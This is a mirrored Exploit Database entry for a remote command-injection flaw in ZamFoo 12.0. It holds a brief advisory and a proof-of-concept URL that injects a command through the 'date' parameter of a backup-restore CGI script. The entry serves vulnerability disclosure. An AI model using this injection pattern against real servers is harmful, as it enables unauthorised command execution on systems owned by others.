ZamFoo – ‘date’ Remote Command Injection

• Exploit Database
• 128 阅读

• 作者： localhost.re
  日期： 2013-06-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38598/
• 1 2 3 4 5 6 7 8 9 10

  source: https://www.securityfocus.com/bid/60826/info   ZamFoo is prone to a remote command-injection vulnerability.   Attackers can exploit this issue to execute arbitrary commands in the context of the application.   ZamFoo 12.0 is vulnerable; other versions may also be affected.   http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=<code>command